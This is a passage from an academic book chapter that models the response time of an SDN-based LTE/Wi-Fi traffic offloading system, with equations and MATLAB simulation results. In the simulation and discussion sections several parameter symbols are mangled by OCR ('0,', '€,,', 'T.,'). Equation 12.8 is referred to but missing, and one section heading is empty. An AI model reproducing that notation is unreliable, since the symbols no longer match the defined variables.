of their systems. Therefore, it is proved that along with this transformation, 
the number of smart device users has considerably increased globally, con- 
tributing to the growth of data traffic volume. It proves that mobile service 
providers show an increased interest in solving the problem of insufficient 
bandwidth of cellular networks. 

Several studies have been carried out to evaluate the performance of
SDN [24-26]. Also, several studies [27-31] have produced solutions for
data traffic offloading systems. However, there is still a lack of methods
for computing the response time of the data traffic offloading process to
estimate the efficiency of data traffic offloading systems. A study on
“modeling and evaluation of software defined networking based 5G core
network architecture” [32] suggests that performance evaluation of data
traffic offloading, including load balancing, is necessary. It is an
inherently challenging task to predict the time taken to complete the data
traffic offloading process, which has led to real-time decision making in
the mobile communication industry.

To meet the bandwidth demand in a cellular network, an innovative cellular
network should be created using a fast wireless communication channel with
less transmission latency. The heterogeneous network infrastructure
supports a high capacity of network bandwidth, which effectively offloads
the network data traffic. To integrate Wi-Fi into the Long-Term Evolution
(LTE) network, the 3GPP (Third Generation Partnership Project) standard
defines the Access Network Discovery and Selection Function (ANDSF)
[33-35]. ANDSF supports the development of a precise framework for data
traffic offloading that provides information to mobile devices on an
alternative wireless network.

The present work intends to develop a comprehensive computation 
model which produces more practical benefits to analyze the real-time 
performances of the Software-defined networking (SDN) based data traffic 
offloading process. The simulation results investigate the accuracy of the 
SDN-TOS computation model with the comparison between our model 
and Cloud Service Providers (CSP) approach [36] computation model that 
does not consider some crucial tasks of the data traffic offloading process. 
Further, another simulation result also provides the guidelines for imple- 
menting faster service by minimizing the time consumption of data traffic 
offloading in mobile and data communication. This work, therefore, pres- 
ents a scheme that identifies the potential importance of efficiency and 
effectiveness of the SDN-based data traffic offloading process to maximize 
the service quality for data and mobile communication users worldwide. 


12.1.1 Motivation 


Most studies of Software-defined networking (SDN) based data traffic
offloading systems have covered only the theoretical framework and system
feature considerations of the data traffic offloading method. This study
seeks to address the significant drawbacks of previous works [27-30] which
were not considered in evaluating the efficiency of the SDN-based data
traffic offloading system (SDN-TOS). As shown in Table 12.1, each study is
missing certain important parameters when estimating the computation time.

Table 12.1 A comparison among previous studies and the components used by
those studies to estimate the computation time of SDN-TOS.

Column groups: System components; Technology consideration; System design
components; Observes user satisfaction on; Interested groups.
Columns: centralized SDN controller with sub-controllers; open flow
(software-defined) switches; multipath; load balancing; network status
monitoring; optimal path configuration; bandwidth computerization; response
time of data traffic offloading system(s); throughput (bits/sec); cellular
network providers; mobile users.
Studies compared: Du et al. (2019) [28]; Zhao et al. (2019) [27]; Cui et al.
(2018) [33]; Chen et al. (2018) [37]; Krishna et al. (2018) [34]; Feng
et al. (2016) [38]; Orimolade et al. (2015) [35]; Alvizu et al. (2014) [39];
Arslan et al. (2014) [29]; Triantafyllopoulou et al. (2012) [36].

For instance, load balancing, open flow switches, and observing user
satisfaction with the response time of data traffic offloading system(s)
and throughput (bits/sec) are some of the elements not considered in most
of the previous work. This study aims to achieve higher accuracy for the
computation time by considering all the offloading tasks related to
SDN-based data traffic offloading processes. To prove this, we compare our
model with the CSP approach [36], which considered only a node-based
offloading task throughout one network. Further, we intend to identify the
essential parameters that directly affect mobile and data communication
performance using different service providers.


12.1.2 Objective 


The objective of this chapter is to accurately estimate the computation time 
for a software-defined networking-based data traffic offloading system in a 
heterogeneous network using the essential parameters. 


12.1.3 The Main Contributions of This Chapter 


1) Estimate the computation time for a software-defined 
networking-based data traffic offloading system in a het- 
erogeneous network. 

2) Identify essential parameters that impact the real-time 
performances of mobile and data communication services. 

3) Identify the value of the load balancing mechanism in
allowing the centralized SDN controller to handle different
control functions with high efficiency.


The rest of this chapter is organized as follows: Section 12.2 explains
the SDN-TOS mechanism. The computation model for the time consumption of
our system is presented in Section 12.3. Section 12.4 presents the results
of our analysis using our proposed computation model. Section 12.5 provides
a related discussion. Finally, the chapter concludes in Section 12.6.


12.2 Analysis of SDN-TOS Mechanism


In the LTE and Wi-Fi cellular traffic offloading scenario, an SDN-based
system considers a higher overall throughput for mobile users. Meanwhile,
utilization of the network resources also increases, providing better
network performance for a mobile wireless network. In this section, we
discuss the key design considerations of the SDN-TOS system.


12.2.1 Key Components of SDN-TOS


12.2.2 LTE/Wi-Fi in a Heterogeneous Network (HetNet)


The heterogeneous network provides better service provision, which
encourages mobile service operators to move the LTE network to a HetNet
because of the insufficient bandwidth of a cellular network. The
integration of the LTE and Wi-Fi networks can be divided into network
selection and network flow scheduling.


12.2.3 Centralized SDN Controller 


Centralized SDN controller methodology can be used in the logically 
implemented platform by using the control logic technique. Different 
types of network device behavior are consolidated in a centralized SDN 
controller platform as follows: 


a) Load balancing:
To reduce the response time of the SDN controller, the load
balancing technique [37] handles a large number of network
packets by allocating them to different node devices. To
overcome the scalability and reliability issues of a
centralized SDN controller, load must be distributed among
sub-controllers through the load balancing mechanism.

b) Network traffic steering:
As an emerging technology aimed directly at the data traffic
offloading problem, traffic steering [28] concerns the
bandwidth allocation and the set of networks that lead
network transmission to a traffic offloading solution.


12.2.4 Key Design Considerations of SDN-TOS


To anticipate the optimal path selection for multipath Transmission
Control Protocol (TCP) sub-flows, some considerations are needed for every
mobile user within the LTE and Wi-Fi range through the centralized SDN
controller: 1) collecting network status information, 2) optimal path
selection via the bandwidth allocation module, and 3) optimal path
configuration. Guidance of open flow switches that rely on an open standard
protocol, such as OpenFlow [39], is more important to consider than where
to forward the packet.


12.2.4.1 The System Architecture 


The SDN-TOS architecture consists of several main parts, as shown in
Figure 12.1: the Mininet Wi-Fi emulator, which covers both the LTE network
and the Wi-Fi network, uses open flow switches to provide the communication
protocol (open flow protocol), and uses Multipath TCP sub-flows and ANDSF
to make a proper network selection; and the SDN controller, which performs
three major functions (network information monitoring, the optimal
bandwidth allocation (OBA) module, and optimal path configuration) while
using the load balancing technique to handle the workload of the
controller.


12.2.4.2 Mininet Wi-Fi Emulated Networks


a) Wi-Fi network:
The Wi-Fi access point accepting wireless connections from
mobile users is examined in the OVS (Open vSwitch), which is
established as the core of the Wi-Fi emulated network. The
purpose of the Mininet emulator is to add virtualized
wireless interfaces to the SDN switch(es). It then uses the
Linux kernel to configure them into a wireless medium.

b) LTE network:
The Linux traffic control mechanism is used to form the LTE
network in the Mininet Wi-Fi platform, setting cellular
channel characteristics such as network bandwidth, link
latency, and jitter. On this basis, longer latency and a
large bandwidth pool are established in the LTE network.


Figure 12.1 The system architecture of Software-defined network-based data traffic
offloading system (SDN-TOS).


12.2.4.3 Software-Defined Networking Controller 


a) Network status information collection:
The sub-controller of the SDN centralized controller that
inspects the network status information provides the
collected information to the bandwidth allocation module to
envision the best path (considering the best performance
along with connectivity between mobile user devices and
network systems).

b) Optimized bandwidth allocation (OBA) module:
The network status information gathered by the sub-controller
is taken in by the OBA module to adjust the optimal path
selection.

c) Optimal path configuration:
The open flow table supports the decision of path selection
in the SDN sub-controller. It contains the matching fields
and the actions needed to set up the path configuration. The
most appropriate implementation technique is assigning a
unique IP address to each mobile device whenever it connects
to the heterogeneous network.


12.3 Materials and Methods


In this section, we estimate the response time of SDN-TOS using the
following computation model. SDN-TOS mainly consists of two significant
parts established between mobile service providers and mobile service
requesters: the Mininet Wi-Fi emulator and the SDN controller. The time
consumption of both the Wi-Fi emulator and the SDN controller plays a vital
role in determining the efficiency of the data traffic offloading system.


12.3.1 Estimating Time Consumption for Mininet 
Wi-Fi Emulator 


In the cellular network environment, the characteristics and parameters
are defined with regard to the optimal number of cellular network nodes.
Every mobile service operator chooses the number of nodes it considers well
suited to the relevant area, taking into account its density and the
network resources. Mobile devices are typically encouraged to set up a
Multipath Transmission Control Protocol (MPTCP). In addition, MPTCP [28]
brings benefits to SDN-TOS such as traffic splitting, minimum transmission
interruption, and quality of service (QoS). Executing the mobile service
and the data traffic offloading process consumes a significant amount of
time to complete the task of the Mininet emulator. Figure 12.2 shows an
overview of the Mininet Wi-Fi emulator. As our assumption, the time
consumption of the Wi-Fi emulator falls into two significant categories:
the LTE network (1 to n network nodes) and the Wi-Fi network (1 to m
network nodes).


Figure 12.2 Overview of Wi-Fi Mininet emulator including LTE network and Wi-Fi


12.3.1.1 Total Time Consumption for Offloading the Data Traffic 
by Service Provider 


During the task of the Mininet emulator, the time the mobile service
provider takes to complete, on provider node N (Step 01), the service
requested by the mobile service requester is the performance measurement of
mobile service composition. CPU cycles dominate the time consumption of the
mobile service. The computation capability, which considers the number of
CPU cycles per node, is essential to execute the mobile service. In this
scenario, the proposed data traffic offloading system has a mobile edge
computing environment, and latency is a significant factor for it. At this
point, we assume that latency is a constraint. Figure 12.3 shows the time
computation model for the SDN-based data traffic offloading (SDN-TOS)
system and demonstrates these steps.


Figure 12.3 Time computation model for SDN-based data traffic offloading (SDN-TOS) system.


a) Step 1: First, estimate the execution time for the service
provider.

b) Step 2: Then estimate the time for the offloading task,

c) Step 3: and the time consumption of both the LTE and Wi-Fi
networks. This will be used to acquire the response time of
the Wi-Fi emulator.

d) Step 4: To estimate the time consumption of the SDN
controller (Section B), the acknowledge time and a load
measurement are used to build the response time for the SDN
controller.

e) Steps 5 to 8: Next, using Step 4, the response times of the
three primary SDN sub-controllers and the centralized SDN
controller are estimated.

f) Finally, combining Sections A and B, the total time
consumption of the proposed system can be obtained.


First, we use Equation 12.1 to calculate the total response time to
complete the offloading process. The data traffic offloading task from one
node to another in the heterogeneous network concerns both the sending data
and the receiving data of the service provider. This phenomenon, which
depends on the data sizes $\theta_i$ and $\theta_o$ and the uplink data
rate, is considered in Step 2 of our computation model. The service
provider is responsible for offloading both sending data and receiving data
to give better output to the mobile service requests. Executing the mobile
service and the data traffic offloading process dominates the overall
performance of the Mininet emulator for both the Wi-Fi and LTE networks. We
adapt the work of [36], which is well suited to the time consumption of the
Wi-Fi emulator. We represent the uplink data rate as $\varepsilon_N$,
assuming that the uplink data rate is similar to the downlink data rate.
Let $\theta_i$ and $\theta_o$ be the incoming and outgoing computational
data traffic on the service provider node. Let $\mu_N$ be the number of CPU
cycles required on the service provider node, and $\tau_N$ the
computational capability of the service provider node. We evaluate the
total time consumption for offloading the traffic by the service provider,
$T_s$, by


$$T_s(N) = \frac{\mu_N}{\tau_N} + \frac{\theta_i}{\varepsilon_N} + \frac{\theta_o}{\varepsilon_N} \tag{12.1}$$


where N is the service provider node (N = 1, 2, 3, ..., n), where n is the
number of service provider nodes in the relevant area.


12.3.1.2 Total Time Consumption of Mininet Wi-Fi Emulator
(Time Consumption for Both LTE and Wi-Fi Network)


The SDN-TOS system is focused on the heterogeneous network, which covers
both the Wi-Fi and LTE networks. The uplink data rates for the service
provider and the service requester are considered the same for both LTE and
Wi-Fi networks when calculating the total time consumption of offloading
the data traffic (Step 03).

Let $T_{WiFi}$ be the time consumption for the Wi-Fi network traffic
offloading process and $T_{LTE}$ the time consumption for the LTE network.
The mobile service provider uses the same data traffic volume for each
mobile network in the same mobile service geographical area. Hence, the
input and output data sizes of the service provider node have the same
values for both the Wi-Fi and LTE networks. The total time consumption of
the Mininet emulator ($T_{WE}$) (Part A) is the sum of the time for the
Wi-Fi network and the LTE network. The total time consumption for the
Mininet emulator ($T_{WE}$) is represented by Equation 12.2.


Figure 12.4 The overview of centralized SDN controller with three major sub-controllers:
network status monitoring controller (NSM), bandwidth allocation sub-controller (BC)
and edge device updating sub-controller (EDU).


$$T_{WE} = \sum_{L=1}^{n} T_{LTE} + \sum_{W=1}^{m} T_{WiFi} \tag{12.2}$$


Using Equation 12.1 and Equation 12.2, the total time consumption of 
Mininet Wi-Fi Emulator can be calculated as shown in Equation 12.3, 


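$$T_{WE} = \sum_{L=1}^{n}\left(\frac{\mu_L}{\tau_L} + \frac{\theta_i}{\varepsilon_L} + \frac{\theta_o}{\varepsilon_L}\right) + \sum_{W=1}^{m}\left(\frac{\mu_W}{\tau_W} + \frac{\theta_i}{\varepsilon_W} + \frac{\theta_o}{\varepsilon_W}\right) \tag{12.3}$$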

LTE nodes can be denoted as L (L = 1,2, 3..., n) instead of N in Equation 
12.1, where n is the number of nodes of LTE network in the relevant area 
of the mobile service provider and Wi-Fi node can be denoted as W (W = 
1,2, 3..., m) instead of N in Equation 12.1, where m is the number of Wi-Fi 
access points. 


12.3.2 Estimating Time Consumption for SDN Controller 


During data traffic offloading execution, the SDN controller completes the
different functions discussed in Section 12.2. The SDN controller acts as a
centralized controller that gives different outputs for the configurations
of the system through the open flow protocol [39].

The different functions of the SDN centralized controller of the SDN-TOS
system consume different response times depending on the number of open
flow switches. The idea of sub-controllers, their architecture with the
number of switches, and their relationship with the major controller makes
a clear path to build the formulas. Figure 12.4 shows the overview of the
centralized SDN controller. It handles three major sub-controllers: the
network status monitoring controller (NSM), which uses k open flow
switches; the bandwidth allocation sub-controller (BC), which uses l open
flow switches; and the edge device updating sub-controller (EDU), which
uses m open flow switches.


12.3.2.1 Total Response Time for Sub-Controller


The total response time of the sub-controller ($T_{C_n}$) (Step 04) depends
on the response time of the sub-controller for the number of open flow
switches and its workload. The total response time of the sub-controller
can be expressed as the response time for the number of switches of the
controller, $T_{ack}$, divided by the load measurement of the
sub-controller. The response time for the number of switches, $T_{ack}$,
can be derived from the time difference between the data packet-in message
reaching time and the acknowledging time for the data packet-out message.
The load measurement of the sub-controller, $\Gamma_{C_n}$, depends on
packet-in messages and the number of open flow switches. The work of [37]
contributed to building up the formulas of this section. The number of open
flow switches starts from 2, which means that every SDN sub-controller must
have a minimum of 2 open flow switches for both LTE and Wi-Fi network.

Let $C_n$ be the SDN sub-controller number, where n = 1, 2 or 3 (the
SDN-TOS system has three major sub-controllers, represented by $C_1$,
$C_2$ and $C_3$). Hence, the response time for the number of switches of
the SDN controller, $T_{C_n}$, can be represented by Equation 12.4,


$$T_{C_n}(u) = \frac{\sum_{u=2}^{y} T_{ack}}{\Gamma_{C_n}} \tag{12.4}$$


where u (u = 2, 3, ..., y) indexes the open flow switches and y is the
maximum number of open flow switches of the sub-controllers of the
centralized SDN controller.


12.3.2.2 Total Response Time for the Total Process of Centralized
SDN Controller


Estimating the total response time of the SDN centralized controller
requires the response times of the different sub-controllers: network
status monitoring (NSM) as sub-controller 1, $t_{C_1}$ (Step 05), bandwidth
computerization (BC) as sub-controller 2, $t_{C_2}$ (Step 06), and edge
device updating (EDU) as sub-controller 3, $t_{C_3}$ (Step 07).

The centralized SDN controller also needs some time to give its response to
the sub-controllers before completing the task of the SDN-based controller.
Every sub-controller has a minimum of 2 open flow switches. Consequently,
the centralized SDN controller has a minimum number of open flow switches
q = (i + j + s) = (2 + 2 + 2), therefore q = 6. The SDN response time
(Step 08) can be represented as $t_{cs}$. Let $\Gamma_{C_1}$,
$\Gamma_{C_2}$, $\Gamma_{C_3}$ and $\Gamma_{cs}$ be the load measurements
of the sub-controllers and the major controller. The total response time of
the SDN-based controller, $T_{cs}$, can be calculated using Equation 12.5,


$$T_{cs} = t_{C_1} + t_{C_2} + t_{C_3} + t_{cs} \tag{12.5}$$

Using Equation 12.4 and Equation 12.5, the total time consumption by the
centralized SDN controller can be calculated using Equation 12.6.


$$T_{cs} = \frac{\sum_{i=2}^{k} T_{ack}}{\Gamma_{C_1}} + \frac{\sum_{j=2}^{l} T_{ack}}{\Gamma_{C_2}} + \frac{\sum_{s=2}^{v} T_{ack}}{\Gamma_{C_3}} + \frac{\sum_{q=6}^{h} T_{ack}}{\Gamma_{cs}} \tag{12.6}$$


where i (i = 2, 3, 4, ..., k) indexes the open flow switches of the NSM
controller and k is the number of open flow switches of NSM; j (j = 2, 3,
4, ..., l) indexes the open flow switches of the BC controller and l is the
number of open flow switches of the BC controller; s (s = 2, 3, 4, ..., v)
indexes the open flow switches of the EDU controller and v is the number of
open flow switches of the EDU controller; and q (q = 6, 7, 8, ..., h)
indexes the switches of the major SDN controller, so h is the number of
open flow switches of the SDN centralized controller.


12.3.3 Estimating Total Time Consumption for SDN-Based 
Traffic Offloading System (SDN-TOS) 


The total process of the SDN-based traffic offloading system works through
the SDN centralized controller and the Mininet Wi-Fi emulator. When the SDN
controller completes the significant process of SDN-TOS, the Mininet Wi-Fi
emulator provides the virtualized wireless interfaces to the SDN
controller’s open flow switches and completes the configuration task
through a wireless medium. Consequently, the SDN controller and the Wi-Fi
emulator have a significant relation in completing the data offloading
process of SDN-TOS. The total time consumption for the SDN-TOS system can
then be estimated as the sum of the time consumption for the Mininet Wi-Fi
emulator and the time consumption for the centralized SDN controller. The
total time consumption for the SDN-based traffic offloading system
(SDN-TOS), $T_t$, can be calculated using Equation 12.7,


$$T_t = T_{cs} + T_{WE} \tag{12.7}$$

Using Equation 12.3, Equation 12.6 and Equation 12.7, Equation 12.8
calculates the total time consumption for SDN-based traffic offloading
system (SDN-TOS)


12.4 Simulation Results


Our results and analysis were produced using MATLAB (MathWorks Inc.,
Natick, MA, USA) R2019b on a computer running macOS High Sierra (Version
10.13.6, Apple, CA, USA) with a 1.7 GHz Intel Core i7 CPU and 4 GB of
1600 MHz DDR3 RAM. The essential parameter values, such as the input
computational data traffic for both LTE and Wi-Fi networks and the
estimated response time for the SDN-TOS process, are used in our
simulation. All the parameter values used in our computation model are
listed in Table 12.2, where we also indicate the references from which
those values originate. The values related to the process of the Mininet
emulator were acquired from an Asian mobile communication company through a
third-party broker.

In our simulations, we consider a cellular network of randomly selected 
geographical area with N = 4 network nodes. We assume that the number 
of network nodes is similar for both LTE and Wi-Fi networks in the same 
geographical area. We consider the parameter values in Table 12.2 as the 
values used by Service Provider A. 

Regarding Service Provider A, input computational data traffic value 0, 
for both LTE and Wi-Fi networks is set to 320 Mb and Output computa- 
tional data traffic value 0, is set to 288 Mb. Consequently, it can be possibly 
referred that input and output computational data traffic values are nearly 
Table 12.2 Parameter values used in the computation model.

Description | Parameter value | Constant (C)/varied (V)
Service provider node | |
Num of CPU cycles on LTE provider node | 1000 megacycles | C
Num of CPU cycles on Wi-Fi provider node | 1000 megacycles | C
Computational capability of LTE node | 50 megacycles/sec | C
Computational capability of Wi-Fi node | 50 megacycles/sec | C
Input computational data size | 320 Mb (megabits) | V
Uplink data rate | 16 Mbps (megabits per second) | C
Output computational data size | 288 Mb (megabits) | V
Time consumption for Mininet Wi-Fi emulator | s (seconds) | V
SDN controller's response time | | V
Load measurement of SDN controller | J (joule) | V
Acknowledge time | | V
Packet In messages to SDN controller | | V
Total response time of SDN controller | 110 s (seconds) [29] | V
Response time of network status monitoring controller | s (seconds) | V
Response time of optimal bandwidth computerization controller | s (seconds) | V
Response time of Edge device updating | s (seconds) | V
Total time consumption of SDN-TOS system | s (seconds) | V

the same. For this reason, we varied only the input computational data
traffic, from 0 to 400 Mb, and computed the total response time for each
data traffic value, while the uplink data rate, the number of CPU cycles
on the LTE and Wi-Fi provider nodes, the computational capability of the
LTE and Wi-Fi nodes, and the total response time of the SDN controller
are assumed to be constant.

Then, we compare the effect of computational data traffic on response
time between different service providers. The values listed in Table 12.2
are taken as those of Service Provider A. We use different values for
Service Provider B, the other service provider in our comparison. Let us
consider that both service providers handle 4 network nodes in a randomly
selected mobile service station. In this scenario, the uplink data rate
(€,, €) is set to 20 Mbps, and the computational capability (t,, t,,) is
set to 100 megacycles for Service Provider B. For all our simulations, the
total response time of the centralized SDN controller of SDN-TOS is taken
as T.,= 110 s, as in [29], for both Service Provider A and Service
Provider B.


12.4.1 Effect of Computational Data Traffic 0, on Total 
Response Time (T,)/Service Provider A 
and CSP Approach 


In this scenario, the CSP approach considers only one network, whereas
our computational model considers both the LTE and Wi-Fi networks.
Further, our computation model considers the response time of the SDN
controller as well. As illustrated in Figure 12.5, we observe that the
effect of computational data traffic on the total response time in our
model is slightly higher than in the CSP approach computation model [36].
The CSP approach [36] selects the node-based method to estimate the total
response time of the offloading process with only one network. In
addition, we consider that our computation model represents every possible
time consumption during the data traffic offloading process. Hence, this
illustration contributes to determining that our computational model gives
a highly accurate value for the response time of the SDN-based data
traffic offloading process. Moreover, this comparison helps us to find
that the time consumption of all the networks needs to be considered when
offloading the data traffic. Besides, the time consumption of the SDN
controller's task is also important for measuring the effectiveness of the
SDN-based data traffic offloading process.

Figure 12.5 Effect of computational data traffic (0) on the total response
time of SDN-TOS (T,) in our model and CSP approach.


12.4.2 Effect of Computational Data Traffic 0, on Total 
Response Time (T,) for Different Service Providers/ 
Service Provider A and Service Provider B 


Next, we vary the input computational data traffic value 0, and observe
its effect on total response time, to reflect the essential parameters
affected by the data traffic offloading task. For this evaluation, we
consider different values for different service providers - Service
Provider A and Service Provider B. As indicated in Figure 12.6, Service
Provider A shows a dramatic increase in the effect of computational data
traffic on response time when compared to Service Provider B. Note that
when the values of uplink data rate (€,§,) and computational capability
(t,, t,,) increase, the total response time for the SDN-based data traffic
offloading process decreases. Interestingly, the effect of computational
data traffic 8, becomes high at low values of uplink data rate (&,, §) and
computational capability (t,, t,,) of the service provider nodes, as in
Figure 12.6.

Figure 12.6 Effect of computational data traffic (0,) on the total response
time of SDN-TOS (T,) for different service providers - Service Provider A
and Service Provider B.

Hence, we can observe that uplink data rate and computational capabil- 
ity affect the SDN-based data traffic offloading process regarding the effect 
of data traffic on total response time, in a given mobile service station of a 
service provider. 


12.5 Discussion 


With the rapid development of distributed cloud computing architecture
and IoT, the amount of transmitted data is increasing. This increase can
affect the performance of data transmission, making it important to
understand how to calculate an accurate response time. Therefore, this
study set out with the aim of assessing the importance of estimating the
response time of the SDN-based data traffic offloading system. The purpose
of our model is to identify the effectiveness and efficiency of the
offloading system for handling the data traffic in the heterogeneous
network.

The most exciting finding was that our computational model has a higher
response time, since there is extra time in data traffic offloading
through the SDN controller and more cellular networks, as compared to the
CSP approach [36] model. Since the CSP approach computes time by
considering only a node-based offloading task throughout one network, and
as we compare more parameters, including the offloading traffic of LTE and
Wi-Fi networks, we can observe that our computation model produces a more
accurate value for the response time of SDN-TOS. Furthermore, there are
studies [40-42] that discuss delays in LTE and Wi-Fi networks, indicating
the importance of considering their offloading traffic.

As shown in Figure 12.5, our model shows 950 seconds while the CSP
approach shows 600 seconds as the total time consumption of SDN-TOS
for input computational data traffic of 350 Mb. That is a 350-second
difference, which means the CSP approach shows 36.84% less time compared
to the more accurate time. Therefore, our results show that the
significance of computation capability and data uplink rate is difficult
to ignore during the data offloading task. In fact, the parameter values
of computation capability and data uplink rate have a significant impact
on SDN-based data traffic offloading speed.

Furthermore, Figure 12.6 shows that when we double the computational
capability of LTE and Wi-Fi, the total time consumption of SDN-TOS
decreases. We used 50 megacycles per second of computational capability
(t,, t,,) for provider A and 100 megacycles per second for provider B.
We also used an uplink data rate of 16 Mbps for provider A and 20 Mbps
for provider B. When the computational data traffic (0,) is 350, the total
time consumption of SDN-TOS for provider B is decreased by 26.32%, proving
the importance of considering computation capability and data uplink rate
when estimating the SDN-based data traffic offloading speed accurately.

The results also indicate that computing the response time of the SDN
controller is necessary for controlling multiple sub-controllers while
understanding the process of the load-balancing mechanism. This
phenomenon is not considered in other computation models [36]. These
findings allow identifying important implications for developing
SDN-based data traffic offloading systems. Hence, mobile and data service
providers have the responsibility to consider the workload of the SDN
controller [38], the most appropriate parameters, and the best method for
accurately estimating the response time during the SDN-based data traffic
offloading task in data and mobile communication.

Moreover, studies have been carried out in different industries that
emphasize the importance of calculating the performance accurately.
One of the studies on Vehicular Networks [43] shows the importance of
knowing the end-to-end delay, which includes all the components. Also, a
study on cloud gaming [44], or gaming as a service, highlights the
performance evaluation in SDN-enabled game-aware routing. In this
industry, it is crucial to have high performance, as they live-stream. A
study on "SDN-Based Multi-Tier Computing and Communication Architecture
for Pervasive Healthcare" [45] reveals how the accuracy of the system can
change due to service delay sensitivity. Additionally, estimating the
computation time and understanding the offloading traffic performance is
important for further research areas such as traffic matrix estimation
[46], network resource management [47], energy optimized wireless sensor
networks [48], and 5G mobile networks [49-52].


12.6 Conclusion 


In this study, we proposed a realistic, comprehensive computation model to
estimate the response time of the SDN-based data traffic offloading process
for data and mobile communication services. Our results indicate that if a
centralized SDN controller increases its workload with different functions
through different sub-controllers, the SDN-TOS may have a significant
increase in its response time. They also indicate that the time
consumption of the SDN-TOS is minimized by increasing the values of
computation capability and uplink data rate used in the data traffic
offloading process. The computation capability and uplink data rate of the
data traffic offloading process play a significant role in real-time
decision making for data and mobile communication services. This
understanding of computational time estimation opens future research
opportunities on increasing the performance of the SDN-based data traffic
offloading process, showing which components future studies should pay
more attention to. However, if the architecture we examined changes with
technological advancements, further research in this area may be required
to calculate the computational time with more or fewer parameters
considered.

Our study inspires real-time performance by maximizing the speed of 
SDN-TOS to provide faster service for mobile and data communication 
services. Taken together, these findings enhance our understanding to 
design a precise SDN-TOS for a given time to offload the data traffic, with 
all the essential factors that influence the performance in a heterogeneous 
network, for example, data and mobile communication services. 